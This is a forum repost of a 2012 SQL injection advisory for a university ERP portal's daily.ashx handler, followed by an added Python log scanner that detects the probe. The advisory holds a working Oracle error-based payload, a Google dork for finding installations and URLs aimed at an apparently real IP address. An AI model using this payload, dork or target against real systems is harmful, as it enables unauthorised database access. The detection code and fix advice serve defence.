Praetorian503 Posted December 31, 2012

The ERP (Enterprise Resource Planning) system from Sida University System suffers from a remote SQL injection vulnerability.

# Exploit Author: Shahram Darvishvand [karaji_kt21] <darvishvand.shahram[at]gmail[dot]com>
# Exploit Title: [erp (Enterprise Resource Planning) SQL Injection Vulnerability]
# Vendor: sida university system
# Date: [4/May/2012]
# Google Dork: "نرم افزار جامع erp شامل قوانین کپی رایت می باشد و نوع نسخه بتا می باشد"
# Version: [ 1389/09/17 ]
# Tested on: [ASHX .. Application powered by Oracle DBMS]
============================================================
** This Vulnerability Is On version 1389/09/17 **
--------------------------------------------
Exploit :
http://[IP Or Domain]/Portal/WUC/daily.ashx?title=
============================================================
Example :
http://[IP Or Domain]/Portal/WUC/daily.ashx?title='or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))--
Response : Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - 64bit
==========================================================
[+] Greetz : Fahime.Saveh , Behrooz_Ice
********************************
For Screen shot 1 :
http://46.225.126.74/Portal/WUC/daily.ashx?title='or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))--
For Screen Shot 2 :
http://46.225.126.74/Portal/WUC/daily.ashx?title='or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))--

Source: PacketStorm
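The advisory above shows the probe string an attacker sends to the `title` parameter of `daily.ashx`: a quote, an `or 1=` tautology, the Oracle-specific `utl_inaddr.get_host_address` call used to leak `v$version`, and a `--` comment terminator. Those pieces are exactly what a defender can look for in web-server access logs. The Python below is an added example, not code from the forum post, the advisory author or the vendor: it parses constructed Apache-style combined log lines, URL-decodes each query parameter (twice, to catch double encoding) and scores the value against those indicators, so that a request is flagged even when only part of the pattern is present or the quote arrives as `%27`. The log lines, the IP addresses in them and the score weights are all constructed for this example; the log format regex assumes standard combined-log layout.

```python
"""Detect Oracle SQL-injection probes against daily.ashx in access logs.

Added example for the advisory above. The log lines below are constructed,
and LOG_RE assumes an Apache/IIS-style combined log layout (an assumption).
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample access-log lines: one normal request, the advisory's
# probe URL, a URL-encoded tautology variant, and an unrelated page hit.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Dec/2012:10:00:01 +0000] "GET /Portal/WUC/daily.ashx?title=news HTTP/1.1" 200 512
10.0.0.9 - - [31/Dec/2012:10:00:02 +0000] "GET /Portal/WUC/daily.ashx?title='or%201=utl_inaddr.get_host_address((select%20banner%20from%20v$version%20where%20rownum=1))-- HTTP/1.1" 500 0
10.0.0.9 - - [31/Dec/2012:10:00:03 +0000] "GET /Portal/WUC/daily.ashx?title=%27%20or%201%3D1-- HTTP/1.1" 200 900
10.0.0.7 - - [31/Dec/2012:10:00:04 +0000] "GET /Portal/index.html HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Indicators are scored rather than matched as one rigid signature, so that
# encoding variants and partial probes still raise the score. Weights are
# constructed for this example; tune them to your own traffic.
INDICATORS = [
    ("quote_or_tautology", re.compile(r"'\s*or\s+\d+\s*=", re.I), 2),
    ("oracle_utl_inaddr", re.compile(r"utl_inaddr\.", re.I), 3),
    ("oracle_v_version", re.compile(r"v\$version", re.I), 3),
    ("sql_comment_terminator", re.compile(r"--\s*$"), 1),
]


def decode_params(url):
    """Return decoded (name, value) pairs from the URL's query string.

    parse_qs decodes once; the extra unquote_plus catches double-encoded
    payloads (%2527 -> %27 -> ').
    """
    query = urlsplit(url).query
    pairs = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            pairs.append((name, unquote_plus(value)))
    return pairs


def score_request(url):
    """Score one request URL; returns (score, [indicator names hit])."""
    hits = []
    score = 0
    for _name, value in decode_params(url):
        for label, pattern, weight in INDICATORS:
            if label not in hits and pattern.search(value):
                hits.append(label)
                score += weight
    return score, hits


def scan_log(text, threshold=3):
    """Return alert dicts for log lines whose request scores >= threshold."""
    alerts = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not a combined-format line; skip rather than guess
        score, hits = score_request(match.group("url"))
        if score >= threshold:
            alerts.append({
                "ip": match.group("ip"),
                "ts": match.group("ts"),
                "status": int(match.group("status")),
                "score": score,
                "indicators": hits,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Run stand-alone, the script flags the two requests from `10.0.0.9` and leaves the ordinary `title=news` request alone. Scoring on the decoded parameter value, rather than on the raw request line, is what makes the `%27%20or%201%3D1--` variant match the same rule as the plain-quote probe. The application-side fix for the underlying flaw is the usual one for an ASHX handler talking to Oracle: pass `title` as a bind variable instead of concatenating it into the SQL text.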